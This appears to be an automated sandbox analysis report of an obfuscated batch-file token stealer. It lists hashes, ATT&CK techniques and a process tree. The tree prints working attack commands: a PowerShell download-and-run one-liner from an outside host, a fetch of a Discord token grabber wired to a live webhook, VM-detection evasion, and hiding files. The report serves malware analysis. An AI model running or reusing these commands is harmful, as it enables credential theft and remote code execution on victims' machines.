3b4522e24880a92e0efbff78c221678983c7d994b6bfacce04ceece21f0a60a7

Analysis

max time kernel
142s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20231127-en
resource tags

arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
submitted
28-11-2023 07:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

main_obf.bat
Size

3.3MB
MD5

b7cdd43c690b6f00668ce8c1675d00d4
SHA1

99b96b30be46250658c29d983ffae99840bb9d06
SHA256

3b4522e24880a92e0efbff78c221678983c7d994b6bfacce04ceece21f0a60a7
SHA512

4aaf2da39127e81533b71bf571f6d7dab9c20a0b3e898448e9443bd89ed4c04c2c7bc3354438b3558310e2909ed8ba15116ff9e5b2ad21b0a938f6fe8618f116
SSDEEP

6144:7zrbs20RR7orb8GitYwYN4vkt9oVCTlGMe6pCIPqBkB4slpp0CswOw3XGI19UZua:7FOR7GbVitpU4/VCnCIPZp8zeTgz

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://sped.lol/powershell/virus

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1154180923730952313/_PKvnk60qDFzsFkQO8fp1gMBHfV8EO_aqWU9lOEByDSlOoR8WCPSZNscUhNLA3TMZcb8

Signatures

Blocklisted process makes network request 7 IoCs

flow	pid	Process
21	3320	powershell.exe
23	3320	powershell.exe
27	4656	powershell.exe
29	484	powershell.exe
31	484	powershell.exe
33	3740	powershell.exe
34	3740	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
30	api.ipify.org
31	api.ipify.org

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
3600	timeout.exe
4036	timeout.exe

Runs net.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
3112	PING.EXE
2528	PING.EXE
4576	PING.EXE
3520	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4456	powershell.exe
4456	powershell.exe
3320	powershell.exe
3320	powershell.exe
4656	powershell.exe
4656	powershell.exe
4276	powershell.exe
4276	powershell.exe
4584	powershell.exe
4584	powershell.exe
484	powershell.exe
484	powershell.exe
3784	powershell.exe
3784	powershell.exe
4124	powershell.exe
4124	powershell.exe
3740	powershell.exe
3740	powershell.exe
1848	powershell.exe
1848	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	4456	powershell.exe
Token: SeDebugPrivilege	3320	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	4276	powershell.exe
Token: SeDebugPrivilege	4584	powershell.exe
Token: SeDebugPrivilege	484	powershell.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	4124	powershell.exe
Token: SeDebugPrivilege	3740	powershell.exe
Token: SeDebugPrivilege	1848	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5088 wrote to memory of 4456	5088	cmd.exe	86
PID 5088 wrote to memory of 4456	5088	cmd.exe	86
PID 5088 wrote to memory of 3112	5088	cmd.exe	91
PID 5088 wrote to memory of 3112	5088	cmd.exe	91
PID 5088 wrote to memory of 2496	5088	cmd.exe	92
PID 5088 wrote to memory of 2496	5088	cmd.exe	92
PID 5088 wrote to memory of 808	5088	cmd.exe	93
PID 5088 wrote to memory of 808	5088	cmd.exe	93
PID 5088 wrote to memory of 1112	5088	cmd.exe	94
PID 5088 wrote to memory of 1112	5088	cmd.exe	94
PID 5088 wrote to memory of 3204	5088	cmd.exe	95
PID 5088 wrote to memory of 3204	5088	cmd.exe	95
PID 3204 wrote to memory of 4976	3204	net.exe	96
PID 3204 wrote to memory of 4976	3204	net.exe	96
PID 5088 wrote to memory of 3280	5088	cmd.exe	97
PID 5088 wrote to memory of 3280	5088	cmd.exe	97
PID 5088 wrote to memory of 3320	5088	cmd.exe	98
PID 5088 wrote to memory of 3320	5088	cmd.exe	98
PID 5088 wrote to memory of 4656	5088	cmd.exe	99
PID 5088 wrote to memory of 4656	5088	cmd.exe	99
PID 5088 wrote to memory of 4592	5088	cmd.exe	100
PID 5088 wrote to memory of 4592	5088	cmd.exe	100
PID 5088 wrote to memory of 4404	5088	cmd.exe	101
PID 5088 wrote to memory of 4404	5088	cmd.exe	101
PID 5088 wrote to memory of 4276	5088	cmd.exe	102
PID 5088 wrote to memory of 4276	5088	cmd.exe	102
PID 5088 wrote to memory of 4584	5088	cmd.exe	103
PID 5088 wrote to memory of 4584	5088	cmd.exe	103
PID 5088 wrote to memory of 2528	5088	cmd.exe	105
PID 5088 wrote to memory of 2528	5088	cmd.exe	105
PID 5088 wrote to memory of 4768	5088	cmd.exe	104
PID 5088 wrote to memory of 4768	5088	cmd.exe	104
PID 5088 wrote to memory of 4944	5088	cmd.exe	106
PID 5088 wrote to memory of 4944	5088	cmd.exe	106
PID 5088 wrote to memory of 484	5088	cmd.exe	107
PID 5088 wrote to memory of 484	5088	cmd.exe	107
PID 484 wrote to memory of 4596	484	powershell.exe	108
PID 484 wrote to memory of 4596	484	powershell.exe	108
PID 4596 wrote to memory of 3884	4596	csc.exe	109
PID 4596 wrote to memory of 3884	4596	csc.exe	109
PID 5088 wrote to memory of 3784	5088	cmd.exe	110
PID 5088 wrote to memory of 3784	5088	cmd.exe	110
PID 5088 wrote to memory of 4124	5088	cmd.exe	111
PID 5088 wrote to memory of 4124	5088	cmd.exe	111
PID 5088 wrote to memory of 4576	5088	cmd.exe	113
PID 5088 wrote to memory of 4576	5088	cmd.exe	113
PID 5088 wrote to memory of 4816	5088	cmd.exe	112
PID 5088 wrote to memory of 4816	5088	cmd.exe	112
PID 5088 wrote to memory of 3740	5088	cmd.exe	114
PID 5088 wrote to memory of 3740	5088	cmd.exe	114
PID 5088 wrote to memory of 4344	5088	cmd.exe	115
PID 5088 wrote to memory of 4344	5088	cmd.exe	115
PID 5088 wrote to memory of 1848	5088	cmd.exe	117
PID 5088 wrote to memory of 1848	5088	cmd.exe	117
PID 5088 wrote to memory of 3520	5088	cmd.exe	119
PID 5088 wrote to memory of 3520	5088	cmd.exe	119
PID 5088 wrote to memory of 1296	5088	cmd.exe	118
PID 5088 wrote to memory of 1296	5088	cmd.exe	118
PID 5088 wrote to memory of 2424	5088	cmd.exe	120
PID 5088 wrote to memory of 2424	5088	cmd.exe	120
PID 5088 wrote to memory of 3600	5088	cmd.exe	121
PID 5088 wrote to memory of 3600	5088	cmd.exe	121
PID 5088 wrote to memory of 4036	5088	cmd.exe	122
PID 5088 wrote to memory of 4036	5088	cmd.exe	122

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4404	attrib.exe
4344	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main_obf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$VM=Get-WmiObject -Class Win32_ComputerSystem ; if ($VM.Model -match 'Virtual') { Write-Host 'Virtual Machine Detected. Exiting script.' ; taskkill /F /IM cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4456
- C:\Windows\system32\PING.EXE
  ping -n 2 -w 700 www.google.com
  2⤵
  - Runs ping.exe
  PID:3112
- C:\Windows\system32\find.exe
  find "bytes="
  2⤵
  PID:2496
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:808
- C:\Windows\system32\rundll32.exe
  rundll32
  2⤵
  PID:1112
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3204
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:4976
- C:\Windows\system32\wscript.exe
  wscript /b
  2⤵
  PID:3280
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -c "iex(new-object net.webclient).downloadstring('https://sped.lol/powershell/virus')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Powershell-Token-Grabber/main/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1154180923730952313/_PKvnk60qDFzsFkQO8fp1gMBHfV8EO_aqWU9lOEByDSlOoR8WCPSZNscUhNLA3TMZcb8' | Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4656
- C:\Windows\system32\forfiles.exe
  forfiles /p C:\Users\Admin\AppData\Local\Temp /m GRABBER.exe /c 'cmd /c start @file'
  2⤵
  PID:4592
- C:\Windows\system32\attrib.exe
  attrib +h +s powershell123.ps1
  2⤵
  - Views/modifies file attributes
  PID:4404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -c "Write-Host -NoNewLine $null"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4584
- C:\Windows\system32\find.exe
  find "bytes="
  2⤵
  PID:4768
- C:\Windows\system32\PING.EXE
  ping -n 2 -w 700 www.google.com
  2⤵
  - Runs ping.exe
  PID:2528
- C:\Windows\system32\doskey.exe
  doskey SUBST=PATH
  2⤵
  PID:4944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file powershell123.ps1
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:484
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cgn0klap\cgn0klap.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4596
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9CCC.tmp" "c:\Users\Admin\AppData\Local\Temp\cgn0klap\CSC419DA19DC08E4DE3BD18D4ECCB1A24B9.TMP"
      4⤵
      PID:3884
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$VM=Get-WmiObject -Class Win32_ComputerSystem ; if ($VM.Model -match 'Virtual') { Write-Host 'Virtual Machine Detected. Exiting script.' ; taskkill /F /IM cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$VM=Get-WmiObject -Class Win32_ComputerSystem ; if ($VM.Model -match 'Virtual') { Write-Host 'Virtual Machine Detected. Exiting script.' ; taskkill /F /IM cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4124
- C:\Windows\system32\find.exe
  find "bytes="
  2⤵
  PID:4816
- C:\Windows\system32\PING.EXE
  ping -n 2 -w 700 www.google.com
  2⤵
  - Runs ping.exe
  PID:4576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -c "iex(new-object net.webclient).downloadstring('https://sped.lol/powershell/virus')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3740
- C:\Windows\system32\attrib.exe
  attrib -h -s powershell123.ps1
  2⤵
  - Views/modifies file attributes
  PID:4344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$VM=Get-WmiObject -Class Win32_ComputerSystem ; if ($VM.Model -match 'Virtual') { Write-Host 'Virtual Machine Detected. Exiting script.' ; taskkill /F /IM cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1848
- C:\Windows\system32\find.exe
  find "bytes="
  2⤵
  PID:1296
- C:\Windows\system32\PING.EXE
  ping -n 2 -w 700 www.google.com
  2⤵
  - Runs ping.exe
  PID:3520
- C:\Windows\system32\doskey.exe
  doskey COLOR=CONVERT
  2⤵
  PID:2424
- C:\Windows\system32\timeout.exe
  timeout 3
  2⤵
  - Delays execution with timeout.exe
  PID:3600
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:4036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
3KB

MD5
1a60b78a6407da5854d35d5cfc322bbb

SHA1
5b584bb23a7316143b931ac593965ab62d722daa

SHA256
0212c3d69a67bf67d804cd2dea5d31935692d7becfd72a4329caa1eec223ce4a

SHA512
affcd94d307274990fe9fa310198be4a586aac578f8052f1a4d0e379b9936705a35142a20ea01ebf5175a8b6feaea9838bc8266c405484150e46011725fad440

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
698fdddb236279a0ceea8ee02e27d064

SHA1
a537d1efa5d0437e8c2ce8bb999fe605f144bbff

SHA256
39387d2fe7f4e902c2c7cdf8f147e5efbd3fd0ae19bd3d78556ff1e88a3802de

SHA512
3cfa65dfabca70a6d3f58401d4ca371dea1b6b6a9cc56f3cd674676d78aeb5f92180be3c77c07725c4b6bf5b1c9249aa68be943a896eecfb276e3d43096376e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1dffbab5ecc6d06e8b259ad505a0dc2a

SHA1
0938ec61e4af55d7ee9d12708fdc55c72ccb090c

SHA256
a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

SHA512
93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
94cc8aa302136c58a17742da02e54c48

SHA1
06c269d1a0b648467cc627162d8c2a0727d94123

SHA256
8ff32c0be04cd2af2b9cd5ddb61d74c94af99a9ebad6a57b0e4f3f7896ef7225

SHA512
7d06f705121fcfc8e5d84ab3c7b5a23343e0f5731931a279c2794eefdbb32222f2f3c812767bd05c20dcc2251bb24713351f47865bd9c70e9cdbd600d79292de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1dffbab5ecc6d06e8b259ad505a0dc2a

SHA1
0938ec61e4af55d7ee9d12708fdc55c72ccb090c

SHA256
a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

SHA512
93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0a5cd17907e47ff64a875185265f3207

SHA1
eba3a195ce2bf21620f0ebd86dd9f35a9a4084ab

SHA256
31b4eb83a0afba2946984d9d2cb16169b341a6d8c45efebd4774fe4770df79d6

SHA512
d2a0701006d2b369129d100f96852c8b9d710a9839bbf6a58b5bc8f7a61593eb803d7fdfa7141314bd4f5e47295244116ac461b3c05c6f165eda3aa43240ad97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ac8bbc4665ff3a12951910ed7a66460a

SHA1
ec8da272135eaf1843a1885efd94e8d7f6a6e55e

SHA256
374b6cf1f9993f1c94ef991af90d76aa80df388844ab0aab5093e3337519748b

SHA512
c55d700dc49a76ea834e0761fd91f5f977e89a7721aa243356032bdbd9d63114f40bfded03dc9ada3c66af58ba030dd43076ec5e2a6693305308dd656d8c4303

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
ba72d94ee4bb804e4f97ff4bcc057728

SHA1
4d44fac1db05bb069338f40623c94a324d75ee52

SHA256
321f26fceb9bbbdd68ec2110cf0136d0db9f45962905e84ead57e9a62d1d0d8a

SHA512
fa49dee5e75ede249732ec529cd7f6eebc294bee51d5811c9c33f754735423dccd1acacc977519e7131f62773143765f64425fefb36a55aa89fdf0e14fbc1940

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9CCC.tmp

Filesize
1KB

MD5
6f9856245f0fa27d44533c1c3be5749e

SHA1
766a14f210dd0847ca7c4ae1f5da67642b830f84

SHA256
e02ef9327057834d6cff9cbcaa618c99b62340a86a46435d59644400d4d48048

SHA512
efcd6bfb452277bdf29b43077a62576c908e3ff37579ae3484b5c9c6658fcb185de8a6a16990c81c534fdf5d63df7466f8f239e75da022c3cbf089deda8d00a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dwxsf5gv.icm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cgn0klap\cgn0klap.dll

Filesize
3KB

MD5
e13cbd5b1215f72c395b865847d6e500

SHA1
b447837ec019ef6e9194ae49a95ef862c1e19707

SHA256
bbcd73b35ddf0b4734c308385136faeb21c50a69bc60374de8c086e3e72493d2

SHA512
44ffdde11619df9fe7be9c8daed49a760b91b7f59f59f337d9d59d3df2abc5a4ed4ff028b8112c5dc49fe02b44e1cbcba9a066d17996f15dea093dd289c66c14

Download Submit
C:\Users\Admin\AppData\Local\Temp\powershell123.ps1

Filesize
46KB

MD5
6dc115e289b44cbffefc310dca179523

SHA1
75cb029e2728df1f235d4ed92dc8bd57b4b9dbef

SHA256
87b78a24ca2d07f9705cf306aea0e5db99e7ddff8eea613e323a789acdc75112

SHA512
968996d688a3ad245674cdd30dad32ba8a14de47a4c846cbe32e2e737b603b8cbd11db1f24ee4f8725497fc94674de02387d902899840bd736573c5ac5474cbd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cgn0klap\CSC419DA19DC08E4DE3BD18D4ECCB1A24B9.TMP

Filesize
652B

MD5
726848f9160cbbb5554cba90d512e289

SHA1
4d8dd0cb3977a930a7abc6abea1e80366ed22eb3

SHA256
34128753d12273d6fb9ff19c5fa41e7d7ca7182c6f46b6786a8214c851d2a186

SHA512
bd8120032fddcd7dc1e1dd2747108e698c7d6f9e33e6f194a867d236c7c4cccbb9f51dd30bf9edb120ae8ed6136622d9c7dbf09389d033ea9fab5615a8809404

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cgn0klap\cgn0klap.0.cs

Filesize
336B

MD5
016136b12c8022e3155820dd8811cf72

SHA1
27dc5ae36badef983dbda987bdb4c584659433b6

SHA256
363bc109def451724e5a8fa71b8598e7cd1ea4994622407006def7b2f67dfc56

SHA512
7055a3c610cc797f009cf7bce08febe6d90394736e86c8f4a0f13ee5b9b213649d0c0ce1288199f2aa6c38730b119c751233793f53f694badef0f577deb53c43

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cgn0klap\cgn0klap.cmdline

Filesize
369B

MD5
b3d199a391cedbf4a77bd2cf0e200512

SHA1
8b754005a53e889f3f38e3244fb2c1bf46c32b05

SHA256
3c2e8e3c7029dc8bb3672229ec93053ee485f7a5ff6a89db7270554deb15a80a

SHA512
35503b7c65788ce84b9fb20811fd5a81d4c66e5239beab49e0740f312fa4afb668bf61f66c3187cc6b3d63e2325c8763f3d2ea3072a74c91ef974874b16e6d71

Download Submit
memory/484-89-0x000001B3CAC50000-0x000001B3CAC60000-memory.dmp

Filesize
64KB

Download
memory/484-88-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/484-90-0x000001B3CAC50000-0x000001B3CAC60000-memory.dmp

Filesize
64KB

Download
memory/484-103-0x000001B3E6D90000-0x000001B3E6D98000-memory.dmp

Filesize
32KB

Download
memory/484-105-0x000001B3E6F70000-0x000001B3E6FB4000-memory.dmp

Filesize
272KB

Download
memory/484-106-0x000001B3E7150000-0x000001B3E71C6000-memory.dmp

Filesize
472KB

Download
memory/484-108-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/1848-155-0x0000028CF5C70000-0x0000028CF5C80000-memory.dmp

Filesize
64KB

Download
memory/1848-154-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/1848-168-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/1848-156-0x0000028CF5C70000-0x0000028CF5C80000-memory.dmp

Filesize
64KB

Download
memory/3320-28-0x000002943A790000-0x000002943A7A0000-memory.dmp

Filesize
64KB

Download
memory/3320-17-0x000002943A790000-0x000002943A7A0000-memory.dmp

Filesize
64KB

Download
memory/3320-16-0x000002943A790000-0x000002943A7A0000-memory.dmp

Filesize
64KB

Download
memory/3320-30-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/3320-15-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/3740-153-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/3740-148-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/3740-150-0x000001F6F0BF0000-0x000001F6F0C00000-memory.dmp

Filesize
64KB

Download
memory/3740-149-0x000001F6F0BF0000-0x000001F6F0C00000-memory.dmp

Filesize
64KB

Download
memory/3784-123-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/3784-109-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/3784-110-0x0000021CF80E0000-0x0000021CF80F0000-memory.dmp

Filesize
64KB

Download
memory/3784-121-0x0000021CF80E0000-0x0000021CF80F0000-memory.dmp

Filesize
64KB

Download
memory/4124-133-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/4124-138-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/4124-135-0x000001DE28430000-0x000001DE28440000-memory.dmp

Filesize
64KB

Download
memory/4124-134-0x000001DE28430000-0x000001DE28440000-memory.dmp

Filesize
64KB

Download
memory/4276-58-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/4276-59-0x0000014C5F870000-0x0000014C5F880000-memory.dmp

Filesize
64KB

Download
memory/4276-61-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/4456-12-0x000001B17BE10000-0x000001B17BE20000-memory.dmp

Filesize
64KB

Download
memory/4456-11-0x000001B17BE10000-0x000001B17BE20000-memory.dmp

Filesize
64KB

Download
memory/4456-14-0x00007FFEBF970000-0x00007FFEC0431000-memory.dmp

Filesize
10.8MB

Download
memory/4456-10-0x00007FFEBF970000-0x00007FFEC0431000-memory.dmp

Filesize
10.8MB

Download
memory/4456-9-0x000001B17DFF0000-0x000001B17E012000-memory.dmp

Filesize
136KB

Download
memory/4584-67-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/4584-77-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/4584-73-0x00000221E9B50000-0x00000221E9B60000-memory.dmp

Filesize
64KB

Download
memory/4584-75-0x00000221E9B50000-0x00000221E9B60000-memory.dmp

Filesize
64KB

Download
memory/4584-74-0x00000221E9B50000-0x00000221E9B60000-memory.dmp

Filesize
64KB

Download
memory/4656-42-0x0000027A9D810000-0x0000027A9D820000-memory.dmp

Filesize
64KB

Download
memory/4656-41-0x0000027A9D810000-0x0000027A9D820000-memory.dmp

Filesize
64KB

Download
memory/4656-40-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download
memory/4656-46-0x00007FFEBF990000-0x00007FFEC0451000-memory.dmp

Filesize
10.8MB

Download